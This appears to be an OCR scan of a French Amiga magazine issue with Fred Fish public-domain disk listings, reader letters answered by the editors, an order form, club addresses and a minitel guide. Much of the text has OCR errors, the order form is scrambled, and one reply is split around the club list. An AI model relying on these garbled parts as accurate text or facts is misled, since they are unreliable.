Esuom : Un truc qui déplace le pointeur dans la direction opposée à celle de la souris. Inclut les sources.
Lefty Mouse : Intervertit les deux boutons de la souris afin que les gauchers puissent l’utiliser de la main gauche. Inclut les sources.
ShuJJle : Redéfinit l'utilisation de la touche gauche Amiga + M pour placer l’écran avant à l'arrière au lieu de placer l'écran Workbench à l’arrière.
Sim : Simulateur pour réseaux Register Transfer utilise ,.our décrire les systèmes Hard- wares. Cette version contient en outre un compilateur qui permet de définir des outils en plus de ceux déjà existants dans Sim Version 4.0 FISH 230 Asklask : Vous permet d’examiner les divers bits des structures de tâches de toutes les tâches du système, à partir des listes relatives à Ex- ecBase. Affiche les états, les drapeaux, les piles, les signaux... Vous pouvez également désactiver des tâches, changer leur priorité ou envoyer vos propres signaux aux tâches. Source Incluse.
FedUp : Un éditeur de fichiers octets par octets, qui vous permet de visionner et d’éditer n'importe quel fichier (binaire sur ASCII) en utilisant une représentation ASCII ou héxadécimale.
Filelt : Un programme de base de données écrit en DRACO. Il est sensé être compatible et n’utilise pas en conséquence les facilités d’instruction. Source Incluse.
Ncomm : Un programme de communications basé sur la version 134 de Comm de DJ James avec beaucoup d’améliorations. Comprend aussi plusieurs programmes auxiliaires comme Addcall, Calllnfo, Ibmlso, PbConvert, and ReadMail.
PrivHdlr : Un handler de violation de privilège pour votre 68000. Agit comme Décigel, mais résiste à un rebootage si bien que vous pouvez l’utiliser avec des programmes protégés en copie qui sont lancés à partir du boot Source en assembleur incluse.
Quattro : Encore un clône de Tétris. 3 niveaux de difficulté, des effets sonores, un fond en 43 couleurs, visualisation de la pièce suivante, contrôle en joystick ou au keypad.
Ed l’Epicier : Yoh! Oh! Yoh Oh Oh!
Merry Christmas to ail !!
Iron Mad : Dis donc Ed, c’est la France ici, tu m’as l'air d’avoir encore abusé des nouveautés toi !
Ed l’Epicier : (Repoussant Iron Mad hors de l'édito) Excusez moi chers amis.
Joyeux Noël à tous ! C'est original hein ?
Mais Iron Mad a bien raison, j’ai en effet passé beaucoup de temps devant l’avalanche de Fred FISH que nous avons reçues. Vous allez vous régaler !
De plus pour arroser le tout, je vous propose le contenu des MIA 3 et 4 (Miam Miam). D'ailleurs tout ceci me remet en appétit. Je sens que je vais y retourner. A l’année prochaine.
FISH 231 Diff : Encore un nouveau programme diff.
Celui-ci met à jour l'algorithme conformément aux communications de l’ACM d'avril 1978. 11 crée des sorties plus conviviales que les programmes Diff UNIX. Sources inclus.
File : Programme qui reconnaît les différents types de fichiers et imprime conformément à ce type. Reconnaît les fichiers texte, icônes, exee, fichiers objet standards, fichiers compressés, fichiers de commandes, sources C, directories, fichiers IFF, sources LaTeX, modula II, fichiers ARC, commandes Shell, sources Tex, fichiers
DVI. Fichiers cncodés UU. Fichiers YACC.
Archives ZOO. Version 1.0, sources inclus.
AoClick2 : Programme qui stoppe le cliquetis des drives vides sur B2000 sous AmigaDOS 1.3. 11 devrait aussi fonctionner sur A500. Binaire uniquement, sources disponibles chez l'auteur.
Plot : Permet de réaliser facilement des graphes 2D ou 3D. A.G. Baxter a écrit le programme d'interface avec Intuition (plot) et Tim Mooney les programmes Multiplot et ThreeDPlot appelés à partir du programme PloL Version 1.2, sources inclus.
Sed : GNU sed (Stream edilor : éditeur de flux) pour Amiga. Sed copie les fichiers nommes ou l’entrée standart, sur la sortie standart tout en réalisant certaines opérations d'édition spécifiées par une ligne de commande ou un fichier d'écriture. Version 1.02, sources inclus.
FISH 232 Ballylll : Une nouvelle version des jeux Bal- ly et Bally II. Cette version est plus rapide et fixe quelques bugs. C'est la mise à jour du jeu de la Fish 221.
Dbug : Debugger en C, utilisant les macros.
Il vous fournit un suivi des fonctions, des affichages sélectifs des informations internes. C'est la mise à jour du programme de la Fish 102.
ReSource Demo : Une version demo de Rc- Source, un désassembleur intéractif pour l'Amiga. C'est la version complète du logiciel, mais la fonction "SAVE" est désactivée.
FISH 233 Brik ; Un programme qui calcule les codes de redondance cyclique binaires et textuels (codes CRC). Les codes texte CRC calculés par Brik sont relogeables sur d'autres systèmes dont les fichiers sont dans le format texte habituel.
Brick peut être utilisé pour vérifier et mettre à jour les "checksum header" d'un fichier. Il tourne sous MS-DOS, Unix System V, BSD Unix, VAX VMS et AmigaDOS bien sur ! Varsion 2.0, source inclus.
CacheCard : Un accessoire pour SetCPU à utiliser avec des carte A2620 sur les systèmes 68030. Il modifie la table MMU mise en place par SetCPU pour contrôler sélectivement les caches des cartes d’extension. C'est aussi un exemple indiquant comment un programme accessoire peut rechercher cl modifier la table MMU de SetCPU sans avoir à lire toutes sortes de registres MMU. Version 1.00, sources inclus.
CRC Lists : Tous les fichiers de contrôle CRC pour les disquettes 001 à 231 en utilisant le programme Brik, réalisés à partir des masters de Fred Fish lui même. D’ailleurs c’est lui l'auteur de ces listes.
FISH 234 KwikBackup : Programme de backup de disque dur qui permet d’écrire les données piste par piste sur plusieurs disquettes. Utilise le bit archive, sauve restitue les commentaires et les fiags de protection, et ignore les erreurs durant la restitution. Version 1.0, source en Modulall incluse.
MuchMore : Un autre programme comme "More", "Lcss", ”Pg",...ctc. Celui-ci utilise son propre écran pour afficher le texte avec un scroll lent. Inclut une aide, des commandes de recherche et d'impression de textes. Fonctionne en Pal et NTSC, en italique, souligne et inversé.
Version 1.8. Source incluse, en assembleur et Modula».
NetWork : Un autre programme dans la lignées des “screcn hacks" (gags). On n’en dira pas plus pour ménager l'effet de surprise. Source en Modula» incluse.
Print-It : Programmes permettant d’imprimer des images IFF sur des imprimantes 9 aiguilles compatibles Epson. Imprime en de nombreuses résolutions, avec plusieurs types de conversion des points couleur en noir et blanc.
Source en Modula» incluse.
WBPic : Remplace la couleur 0 du Workbench par une image IFF haute résolution non entrelacée, en 2 ou 4 couleurs. Source en Modula» incluse.
Xhair : Remplace le pointeur de souris par un repère utile pour positionner vos icônes verticalement et horizontalement. Source en Modula» incluse.
FISH 235 Calckey : Une calculette 4 fonctions résidente en mémoire n’utilisant que 24 k de mémoire qui peut effectuer des calculs quelque soit le programme que vous êtes en train d'utiliser. Version 1.0, exécutable uniquement.
Cl : Programme de visualisation d’images ayant pour origine un scanner et, contenant quelques exemples intéressants. Ce programme, bien que ne disposant pas d'une interface utilisateur très évoluée présente quelques fonctions puissantes de traitement d'images telles que con- volutions, moyennes, laplaciens, gradients, détection de contours. Version 2.2, mise à jour de celle du disque 137. Exécutable uniquement Mirronvars : Un jeu sonore qui se joue à deux. Vous combattez votre adversaire au moyen de rayons laser, mais attention aux miroirs qui les réfléchissent.
FISH 236 AmigaBench : Une version assembleur pour Amiga du benchmark de Dhrystone. Version 68000 et 68020.
üiskHandler : Un système de gestion de fichiers qui permet la lecture et l'écriture de disquettes au format 1.2. Source inclus.
Hearl 3D : Programme d'extraction du contour du ventricule gauche sur l'image d'un coeur en provenance d’un scanner Imatron CT. Affiche ainsi un battement de coeur en filairc.
Exécutable uniquement.
Ls : Version 301 du Lister de dircctory UNIX du même nom. Update de la version 2.0 du disque 178. Source Inclus.
Proc : Exemple de programme de création d'un processus DOS sans appel préalable à LoadSeg. Basé sur une idée présentée à BADGE. Source Inclus.
Xprzmodeur : Librairie qui procure à.
L'Amiga des capacités de transfert vers un programme de communication quelconque compatible XPR. Source Inclus.
FISH 237 CLI Print : Un exemple assembleur d’impression CLI. Source Inclus.
Ctype : Un autre programme de consultation de texte. Mais celui-ci est rapide, permet le défilement dans les deux sens et l'impression.
Dplot : Un programme d’affichage de données expérimentales permettant de se déplacer dans les données et d’utiliser facilement des facteurs d’échelle et des fonctions de présentation.
ILBMLib : Une librairie pour l’écriture de fichiers IFF avec des exemples d'utilisation de cctto librairie en C, assembleur et basic.
Paroul : Démo et utilisation du port parallèle en assembleur. Sources inclus.
Speed : Un test de performance à utiliser pour comparer les vitesses de traitement de différents Amiga.
FISH 238 CwDemo : Version de démo d'un utilitaire de contrôle des assignations des registres de couleurs d’intuition, Exécutable uniquement.
Dmouse : Une nouvelle version de cet utilitaire très connu qui rend l'utilisation de l’Amiga d’une simplicité déconcertante. Version 1.20, Update de celle présente sur les Disques 168 169.
LabelPrint : Un programme d'impression d’étiquettes pour vos disquettes. Version 2.5 une mise à jour de celle du disque 210.
NGC : Encore un détecteur de virus. Vérifie le Bootblock sur toutes les disquettes lues et prévient en cas de non respect du standard.
Pyth : Un programme de tracé de l'arbre de Pythagore. Scurccs Inclus.
Steinschbig : un jeu type "Tétris" (Stein- schlag : chute de pierres). Version 1.8, Update de la version 1.5 du disque 221.
FISH 239 Brunjes : Cette disquette comprend un certain nombre d'outils. Stmigpkg est un programme pour les chaines de caractères en FORTH et celles terminées par un NUL. Date & Time sont des outils pratiques jour obtenir et imprimer des formats de dates et d'heures. Utils sont utilisées par les autres programmes. Cursor control est un exemple de déplacement du curseur de texte. Space or Escapc est une instruction pratique pour interrompre momentannément ou définitivement un programme. Les sources sont inclus.
Evolution : Le programme simule graphiquement l'évolution d'une espèce de "punaises".
Elles sont représentées par des gouttes mobiles qui mangent des bactéries. Elles se transforment, se battent pour la nourriture, se reproduisent et transmettent leurs mutations à leur progéniture.
C'est un exemple saisissant de simulation graphique.
FFT : Outils très performants de transformation de Fourrer pour le traitement des signaux digitaux. Le FFT peut être utilisé pour traiter le spectre de fréquences d’un signal complexe. Un programme très utile pour de nombreuses applications.
Guru : U.i outil permettant de comprendre la signification des nombres Guru.
112J : Utilitaire de conversion des fichiers C de type ".II" en fichiers FORTH de type ",J".
HAMmmm2 : Trucs graphiques représentant des lignes en mouvement sur un écran IIAM avec effet hypnotique. Utilise les outils sonores du HMSL s’il sont disponibles pour générer des sons en rapport avec l’image.
IleadClean : Ce programme, utilisé avec une disquette de libre, permet le nettoyage des têtes de lecture de vos drives. Sources inclus contenant des exemples de méthodes d’accès au "Track- Disk device".
JustBeep;• : Exemple d’utilisation des circuits audio et timer pour la génération d'une série de Bips.
MandelBrot : Un programme utilisant les propriétés graphiques de Mandelbrot pour réduire de façon considérable le temps de tracé. Sources inclus.
NeuralNet : Exemple de programmation sous forme de réseau neuronal converti en Jforth. Exemple de structure de programme qui pourrait représenter le futur de la programmation. Source inclus.
Texlra : Un éditeur de textes très simple d'utilisation autorisant les fenêtres multiples et disposant d'un interface utilisateur basée sur la souris. Utile pour les habitués du Macintosh.
FISH 240 CrossOOS : Version de test d'un programme qui permet la lecture et l'écriture de disquettes au format MS-DOS PC-DOS et Atari ST (V 2.0 et suivantes) directement à partir de l’AmigaDOS.
Cette version de démo ne permet que la lecture, les écritures sur disque ne sont pas possibles.
Une version complète est disponible auprès de CONSULTRON pour un prix très raisonnable.
Dis : Une librairie AmigaDOS partageable, implémentant un désas sembleur symbolique mono-instruction pour la famille MC 68000, ainsi qu'un programme utilisant cette librairie pour désassembler Dumper les fichiers objet Amiga- DOS en utilisant pleinement les symboles et les informations de rclocation. Code source en DRACO inclus.
DM-Maps : Cartes au format IFF pour le jeu "Dungcon Master". Les 14 niveaux sont représentés.
Mem-I.ib : Une librairie de routines linkablcs pour faciliter le déboguage des problèmes mémoire. Utilisable avec le Lattice C, V 5.0 et probablement compatibles avec les versions précédentes. Les possibilités sont les suivantes :
- "Trashing" de toute la mémoire allouée.
- "Trashing" de toute la mémoire désallouée.
- suivi de la mémoire désallouée avec notification des
opérations d'écriture, de la double désallocation d'une zone
mémoire ou de son absence.
- notification de la sous ou surutilisation d'une zone mémoire
allouée.
- génération de conditions "Low Memory" à des fins de lest.
- Identification de mauvaise utilisation mémoire par le nomdc
fichier ainsi que le numéro de ligne de la routine ayant
effectué l’allocation. Sources inclus.
Runback : Version 6. Mise à jour de la version présente sur le disque 152 (la version du disque 214 semble avoir évolué de façon différente). Cette version se compile sous Lattice en utilisant de nombreuses optimisations, et peut rester résidente. Sources inclus.
XprLib : Librairie de protocoles de transfert de fichiers. Documentations et exemples de codes pour l’implémentation de protocoles de transfert de fichiers externes utilisant les librairies "partagées" de l'Amiga. Ceci est une mise à jour de la version comprenant le programme VLT du disque 226.
El ce n'esl pas fini ! Vous pouvez commander les Fred FISH Disks jusqu’à la disquette 250 ! (Eh oui, c'est beau Noël...) Iron Mad, Fiat Six, Ed l’Epicier et Gazelle Ardente ENCORE DES NOUVEAUTES !
Pour ceux qui n'en ont pas encore eu assez, ou qui n'ont jamais eu de Mi A Disk entre les mains, voici de quoi rassasier les plus gourmands.
MiA3 Checkfil : sert à déterminer s'il reste suff- isammenl de place sur les disquettes pour copier un fichier.
ClockDoctor 3 : Nettoie les virus qui font tourner votre horloge à 8 heures par seconde.
Cooo : Un petit gadget qui laisse une traînée derrière votre pointeur de souris. C’est très joli.
Ducll : Un jeu dans lequel vous devez abattre de méchants gangsters avant qu'ils ne vous abattent. C'est amusant, si.
Kill Requester : Ce programme supprime tous les requesters indisérables qui ne cessent d'apparaître lorsque vous tapez par exemple dFà: à la place de dfO: et qui vous disent : " Pleasc Inscrt Volume dfà: in any drive”.
Most : Un afficheur de fichiers qui prend en compte tous les fichiers, y compris les compactés. Comprend une bonne interface utilisateur avec gadgets.
Performal : Un super formateur de disquettes. Très efficace, il permet de plus d’installer le bootblock de votre choix sur une disquette. Bien d'autres options en plus à découvrir.
Protecta : Mettez le bit de protection de vos fichiers facilement et simplement avec ce programme.
LS : Une version très, très améliorée du "List" de l'AmigaDos.
SID : Pour "System Information Display".
Vous fournit toutes sortes d'informations sur les librairies, les deviccs, les états des ports, les fenêtres et les écrans d'intuition, etc... SuperBrickout : Avec un nomm comme çà, je suppose que vous avez deviné qu'il s’agit d’un casse-briques, fort plaisant au demeurant.
Wavebench : F.ssayez et voyez ce qui se passe !
Simgen : Un très joli programme dont la lignée de DropCloth, mais en beaucoup plus efficace et attrayant.
Watcher II : Deux yeux apparaissent sur l'écran et suivent les déplacements du pointeur.
Amusant.
SpeedTesl : Un programme qui vous fournit le nombre de Ko lus par seconde par vos lecteurs.
MIA 4 A7.vl.40 : Un super éditeur. "Celui de mes rêves !" Déclare l’auteur. Une bien belle réalisation comme on aimerait en voir plus souvent CPU-Specd : un vu-mètre de la vitesse de traitement de votre machine préférée.
FileFind : Un checheur de fichiers offrant des options "Wildcards".
Gold : Un jeu de plateau et de réflexion pas facile du tout Power-preferences : les Préférences revues et corrigées par .lonathan Potier (un nom familier si vous êtes acctoc des D.P.). Templation : Un peu de musique pour détendre l’atmosphère.
Wandereiv2.2 : Encore un jeu. Très drôle et très prenant !
Zerg : Vous avez aimé la série des "Ultima" et autres "Quesl" ? Alors ce jeu est pour vous.
C’est très bien réalisé. A voir absolument !
Ouf ! Voilà, si avec çà vous n'êtes pas repus, c’est que vous êtes de sacrés goinfres !
Encore qu’en cette période de libations... Ed l'Epicier.
NOËL APPROCHE (RAPPEL) A-News ?a Toute l’équipe d’Hcrmès prendra du repos du 15 décembre au 10 janvier. Nous ne pourrons donc pas satisfaire vos commandes durant cet intervalle. Un conseil, envoyez vos commandes de façon à ce qu’elles nous parviennent avant le 15 décembre.
LE COIN CUISINE Le Homard Jovial à 1‘Américaine Pour 50 personnes
- Homard Jovial de 85 Kilos, étalon dé sa race (bête de
concours) et comptable d association de préférence.
- 4 litres de vodka maison à 95 ".
- 10 litres de vin blanc.
Tuez le Homard Jovial d un coup en lui enfonçant profondément une longue aiguille dans... la bouche. Détaillez ensuite la queue en tronçons et détachez les pinces et pattes sans les briser.
Faites chauffer l'huile dans une baignoire et mettez-y les morceaux de Homard à revenir.
Lorsqu'ils sont bien rouges, versez dessus la vodka et flambez. Mouillez ensuite avec le vin blanc.
Salez et poivrez.
Le mois prochain, le Homard Jovial à la diable flambé au cognac et nappé de sauce aux oeufs et à la crème. Bon appétit à tous.
Fiat Six BON DE CONfvIFIMDE A retourner à : En France : HERMES Diffusion BP 384,59220 Dinsin En Belaiiue: MiA Software BP 111 2018 Anvers Nom : HDNC : PrénoM: Adresse 14 I- V i 1 1 t C . P .
Pay s 20FFC125FB) Fred F i sh Disks 1-250 Anicus 1-26 TBAG 1-25 Faus 1-75 PaNorAnA 1-98 RPD 1-164 30FFC19BFB) HERMES Prestisre 1-4, HERMES France 1-5, Bordel lo Beauties (a reserver aux adultes) 1 19 + 28-26 (Art Disks) 35FF 220FB 360FF D i fr i tal i seur Mono HERMES
M. i.A Disks 1 à 4 en kit (avec schena et notice) I-- Fred Fish
Disks:*» .....Fr
Anicusi» .Pr
TBAG :** ...Pr
Faus: ...Pr
PaHorAnA: ......Pr
RPD: H ....Pr
HERMES Prestise:» .....Pr
HERMES Franc»:** .Pr
MiA Disks:» .....Pr
Borde 1 1 o
Disks:» Pr Diffi tal
i seur HERMES:» .Pr Envoi
en Recommandé (facultatif) cochez la case Paiements: Chèques
bancaires ou postaux libellés a To l'ordre de HERMES
Diffusion.
Les RPD 17,84,86,181,106,107,123,126,129, 143,146,151,155 et 163 et Faus 61 comportent 2 Disks (prix 48FF) total : total : total : total ; total : total : total total total total total i x. i x. i x. i x. i x. i x. i x. i x. i x. i x. i x. 15FF tal Courrier Messieurs et Madame la secrétaire de A-News. (philEd: il y a du progrès, c'est bien! Mais n'oublions pas la Correctrice!)
Je possède un Amiga 2000A avec 1 méga de RAM. En ouvrant la machine, j’ai constaté qu'il était possible d'ajouter 512 Ko de mémoire sur la carte prévue à cet effet. Cependant il faut ajouter de la RAM 41257 (et non de la 41256), et je n’ai pas trouvé de magasin d'électronique vendant cette mémoire.
Benoit Maire Riquewihr (68) philEd: Le technicien que j'ai actuellement sous la main m’assure sous la torture que 41256 ou 41257 c'est la même chose, cela provient seulement de la différence d'approvisionnement. Il suffit donc de rajouter 512 Ko sur la carte et de la reconfigurer en positionnant les jumper comme indique sur le schéma.
:nc 512 Ko :a imo Bonjour Existe t-il un moyen d’obtenir le DBW- RENDER autre que DEEP?
Bruno Rey, Guadeloupe.
PhilEd: DBW-RENDER étant un programme du DP comme pour tous les domaines publics il faut s'adresser soit directement aux auteurs soit écrire aux associations qui promotionnent le DP sur Amiga, Hermes Diffusion par exemple.
Salut à toi, Oh A-News.fet sa Correctrice) (en résumé) Quel driver pour une Star le 24-10 et quel compilateur C choisir, LAT- TICE 5.0 et C++ ou MANX ?
Stéphane Aubert, Roussillon (38) philEd: pour les imprimantes star 24 aiguilles il faut utiliser le driver EpsonQ et pour les 9 aiguilles le driver EpsonX. En général si'il n'existe pas de driver particulier pour votre imprimante essayez directement un de ces deux.
Pour le compilateur C je recommande un peu de patience car te MANX 5.0 doit sortir incessamment sous peu. Il vaut donc mieux patienter encore un ou deux mois car si toutes les rumeurs sont confirmées LAT- TICE pourra retourner développer sa version 6.0. Bonjour à tous et à toutes.
Je vous expose mes problèmes avec Dpaint II acheté chez un bon revendeur. Je possède un A500 avec 1 Mo et un lecteur externe. Sur tous mes dessins (ou presque), lors d’un save print ou load, une superbe frise noire et blanche (toujours la même) s’y inscrit d'un bout à l’autre les abîmant irrémédiablement. Celle ci ressort bien entendu à l’imprimante. Cette manifestation n'apparait qu’avec Dpaint II. Pour un bug cela me paraît un peu gros, alors un virus peut être? D’autant plus qu'avec le WB 1.3 mis à une date antérieure au 13 oct 89 tout fonctionne parfaitement.
Bernard Kubler, Evian (74) philEd: ????????? Ce qui est sûr c'est que ce n'est pas un bug car depuis le temps il serait connu. Une nouvelle espèce du virus du vendredi 13? Cela paraît improbable car il se serait déjà manifesté partout, mais ne jurons de rien. Néanmoins si vous, lecteurs, avez des manifestations semblables n'hésitez pas à nous en faire part.
Cher Anews, A titre d'information sachez qu’un nouveau virus est arrivé: il génère des R W er- rors sur la totalité des pistes des disques (philEd: c'est l'hiver et les virus se multiplient.)
Peut-on comme sur IBM remplacer physiquement certaines louches des claviers? Peut-on utiliser l'Amiga sous UNIX. Si oui a t-on toujours accès à l’environnement Amiga?
Alain Xerri, Brest (29) philEd: Oui il est possible de remplacer les touches du clavier mais je ne sais pas où l'on peut trouver des kits QWERTY. Pour ce qui est d'UNIX ou plutôt AMIX (c'est son nom sous Amiga) il est disponible pour les développeurs. Il n'est hélas pas possible d'avoir accès en même temps à l'environnement Amiga et UNIX. On choisit au moment de booler si on désire démarrer UNIX ou l'Amiga. Consolez vous tout de même car il s'agit d'une version graphique d'UNIX et il existe, entre autre une pendule qui ressemble à celle du WorkBench, le reste suivra plus tard.
A-News, Je désirerais savoir s'il existe un moyen de faire fonctionner sur un A500 un lecteur de disquette 5 1 4 Vortex fxl (lecteur double face fonctionnant sur un Amstrad CPC 464 avec une interface spécifique au lecteur Vortex). Existe-t-il un programme du DP permettant d'utiliser le lecteur dfO: comme lecteur PC 720 Ko pour faire des fichiers ASCII. Pouvez vous me dire si le Turbo Pascal sortira sur Amiga.
Nicolas Charüer (77) philEd: Pour le lecteur Vortex nous avouons notre ignorance mais c'est peut être possible puisque Vortex est spécialiste de ce genre de concept (un même lecteur pour plusieurs ordinateurs avec des interfaces différentes). Il faudrait te renseigner là ou tu l'as acheté. Pour Turbo Pascal le Colonel Chorizo Kid à téléphoné chez Borland et on lui a gentiment expliqué que le marché de l'Amiga n’était pas intéressant, un jour peut être. Enfin il existe un programme DP qui permet de transférer des fichiers d'un disque IBM vers un autre disque (Ram disque par ex) il s'agit
de PC- palch2 qui se trouve, entre autres, sur le MiA diskN° 1 (voir Hermes Diffusion).
Bonjour, Peut-on relier une imprimante Exelwrit- er compatible IBM à port parallèle Centronics à l’Amiga ? Quel est le moyen le moins cher pour digitaliser des images sur Amiga?
Philippe Mallordy, Beauzire (63) philEd: Comme je l'ai déjà dit plus haut on peut relier toutes les imprimantes compatibles PC à un Amiga, le tout est une question de câble et de driver. J'en connais même qui utilisent une DMP 2000 de chez Amstrad. (Ed: c'est une excellente imprimante sauf qu'il faut ajouter de l'encre tout les cinq minutes) En général le driver EpsonX est suffisant mais pas toujours. Pour ce qui est du digilal'iseur vidéo il me semble que le moins cher est DigiView.
Salut à tous et à toutes!
La commande RI de pépé SEKA doit elle être utilisé seulement en mode normal (prompt SEKA ) ou peut on l’employer dans un listing ? Comment fonctionne-t-elle ? C'est expliqué dans le manuel, mais je n’y comprends rien. Est-ce que Shool’Em Up Construction Kit est sorti, et si oui que vaut il (rapidité etc...). Pourquoi Little Zeus sévit-il dans CR et plus chez vous?
Pourquoi tant de Haine? Pourquoi?
Christophe Mathieu Aix Les Bains
(73) Courrier Roméo: Pour ce qui est de la commande RI elle
permet de charger un fichier (image ou son en général) à
l'adresse spécifiée. Il me semble que Shoot'Em Up
Construction Kit est sorti, en tout cas il ne faut pas
s'attendre a un miracle quand à la rapidité. Ce que l'on
gagne en pouvant modifier un maximum de paramètres on le
perd en rapidité. Pour ce qui est de Little Zeus, vous êtes
nombreux à nous poser cette question. Si quelqu'un connaît
la raison, il sera bien aimable de nous la faire savoir.
Vous qui veuille tenter de bricoler une interface pour une carte à 15000 F qu'il ne se gênent pas, mais vu le prix! Pour ce qui est de la mémoire 32 bits elle ne peut pas être utilisée par le 68000. Dernier détail, celle mémoire 32 bits est sur la carte 68030 qu’il faut donc avoir avant (et non pas après) la mémoire.
Ed: Quoi? Qu'est-ce que c'est cette histoire? Ed: a toujours eu de bonnes relations avec Little Zeus.
Hello A-News, Comment peut-on faire une copie d’écran, ou une hard copie, pour avoir un image IFF des fenêtres WorkBench utilisables sous Ppage ou Excellence? Bref, comment faites-vous pour avoir des images d’écran dans votre journal? Les touches NumL etc. sur le pavé numérique sont elles des louches à programmer, ou sont elles utilisables directement? Et si oui comment?
Comment se fait-il que la startup-sequence que j'ai crée sur mon 500 à Kickstart 1.2 ne fonctionne pas chez mon copain qui a un 500 à Kickstart 1.3 ? Y aurait-il certaines commandes du CLI qui feraient défaut? Est-ce que Dos2Dos peut convertir tous les fichiers ST en fichier Amiga, vu qu’ils ont le même formai PC.
Bertrand Le Quellec, Vernouillet (78) philEd: La moitié de nos photos d'écran sont en fait de vraies photos, les autres sont des images IFF sauvegardés avec des logiciels comme GRABBIT ou BT- Snap. Les touches du pavé numérique n'ont rien de spécial, il y a cependant quelques programmes, CED en particulier, qui les utilise pour gérer le pavé numérique comme sur un PC. Pour ce qui est de la compatibilité des startup-sequences, aucun problème. Si sa ne marche pas, c'est qu'il manque quelque chose sur la disquette.
Dos2Dos peut convertir tous les fichiers ST et PC au format Amiga. N' espérez tout de même pas récupérer un jeu sur ST et qu'il marche sur AMIGA, mais tout ce qui est fichiers ASCII, image et son peut être échangé.
A-News: Une question simple si vous pouvez y répondre d’une manière simple. Comment utiliser RAD: ? J’ai modifié la Mountlist. 11 paraît qu'il faut formater RAD: Comment fait-on ? Faut-il mettre un fichier spécial en devs?
André Vignon philEd: Rien de plus simple: il suffit de recopier la mountlist du WB 1.3 d'origine, de vérifier que le fichier ramdrive.device est bien dans le tiroir devs et que le fichier ram-handler est dans le tiroir L. Ensuite il ne reste plus qu'à faire le commande mount RAD: suivi par dir RAD: . On peut alors utiliser RAD: comme le RAM: disque SANS LE FORMATER. Dernier détail, comme me le fait remarqué Ed:, RAD: ne résiste pas au reset si vous avez un Super Fat Agnus.
Note de Ed: Nous avons perdu l'adresse de DJEORGES qui nous avait contacté pour un problème de GFABasic. Si’il nous envoi ses coordonnées nous pouvons donner la réponse.
Messieurs, CLUBS (rubrique gratuite) FRANCE 18 GubInfonn»tique,BP4I3.18007 Iicuises Cedex 37 TOURS MICRO CLUB BP 168 37001 Tours Cedex.
Tdl 47-51-12-11 38 CLUB APOGEE - BP6 38620 MONTFERRAT. Tél.
76 32 38 41 Stéphane PARENTON.
44 Power Club Commodore, Hédi TRIK1, 2 sv de la jeunesse 44700 Orvauh (Nantes) Tél 4040-98-91 49 CLUB AMIGA ANGERS: Pour tout renseignement: Atligand Denis, 65 me du Bon Repos, 49000 Angers. Tél 41-44-2F-S1 57 ALPHA CLUB INFORMATIQUE SARREGUBMINES Foyer Culturel, 3 me Lroth, 57200 SARREGUE- MINES. Tél 87-95-254)3.
64 FRAUG, French Amiga User Group, BP64, 64202 Biarritz Cedex. Ta 5941-17-91.
64 MICROINFORMATIQUE CLUB D'ANGLET TéL 59-52-34-03.
73 Club Amiga 13 av lean Jaurès 73000 Quunbery 93 CMOS BP157 93163 Noisy-le-Grand Cedex, ta 1-64-024545 BELGIQUE 7500 CLUB PA-.C.T. B P94.75Ô0 Tooumai Est-il possible d’adapter une carte accélératrice GVP sur l’Amiga 500? Est ce que la ram 32 bits est utilisable tel quel par le 68000 (c’est dans le but d'utiliser plus tard une carte accélératrice GVP) Un Amiga fan (Suisse) parmi d’autres.
PhilEd: Il n'est momentanément pas possible d'utiliser une carte 68030 GVP sur un 500, même avec les boîtiers qui permettent d'avoir des slots (connecteurs) A2000 si'il n'y a pas de slot CPU. C'est dans ce slot CPU que se niche la carte GVP. D J'entend déjà les bidouilleurs dire : "mais le slot CPU c'est le même que le bus d'extension du 500!". Si il y en a un parmi A-NewsS e zSUISSE Si vous êtes en Suisse vous pouvez vous abonnez àA-News pour 12 numéros pour la somme de 54FS. Envoyez votre paiement à : A-News, 36 Av Lusema. 1203 Genève.
CCP No 12-25868-1 Vous pouvez commencer votre abonnement à partir de n’importe quel numéro, le No 1 compris.
A-News en BELGIQUE
M. i. A. Software assure la diffusion d’A-Aews en Belgique et des
Pays- Bas.
Pour tout renseignement : MiA Software, BP 111 2018 ANVERS 14, Belgique Tél 3-326-05-59 Les anciens numéros sont disponibles au prix de 20F chez: Belgique Media Lem, r François Dorzee 93,7360 Boussu Suisse 12 Edu Soft 14-16 r des Gares 12011 Genève 2 12 IRCO 3 nie Jean Violette. 1211 Genève 4 14 New Distribution, r Philosophes 4,1400 Yverdon 20 Oclopus, r du Bassin 8, 2000 Neuchatel 06 ASCII 10 r Lépante 06000 Nice 13 lnfolog 41 bd Baille 13006 Marseille 31 Volumm 30 r Pharaon 31000 Toulouse 33 CIS 571 571 ers de la Libération, Talcncc 62 Infograph 1 r du 11 novembre, I.ens 64 Bab Micro, 7 rue
de Coursic 64100 Bayonnc 67 ZIOMM 1 r Déserte 67000 Strasbourg 69 Gclain Ets 22 Ave de Saxe, Lyon 91 Essonne Mailing 3 lmp Jules Dalou 91000 Evry 98 Gloria 7 r de Millo, Monte-Carlo, Monaco ON DEEP AMIGA Jeux Le mitigeur mécanique Grohe Europlus en quatre modèles.
Pour bain-douche (avec douchette).
Bec douchette extractible (1,25 m) et inverseur automatique jet douche. Raccords à visser (1 2”). 2 versions : mural (écartement réglable 125 à 175 mm) et sur colonnettes (écartement fixe 150 mmm).
In 'Catalogue Camif hiver 89190 après JC' p539.
Ce mois ci vous allez donc avoir droit, comme vous avez dû lc comprendre, à. La première partie d’une liste des DP classés par rubrique, tels que vous les trouverez sur DEEP.
Après avoir choisi le TELéchargement, vous avez sélectionné la rubrique AMIGA.
La page suivante s’affiche alors (pour des raisons techniques et de place, les pages suivantes ne comportent ni sauts de ligne, ni jolies couleurs comme c’est lc cas sur DEEP).
AMIGA Thèmes : 1 Anews 2 Jeux 3 Graphisme 4 Musique 5 Utilitaires 6 Professionnel 7 Autres Quel thème as-tu choisi ? ... Envoi DIA FOR BAL JEU AFF RUB TEL Deux grands choix vous sont offerts, choisir un thème (n' + ENVOI), ou changer de rubrique en tapant un des mots clé (FOR, BAL..). A tout moment, lorsque vous êtes dans des écrans du téléchargement, vous pouvez remontez d’un niveau avec la touche SOMMAIRE du minitel.
Lorsque vous faites votre choix, la liste des programmes téléchargeables s’affiche comme suit.
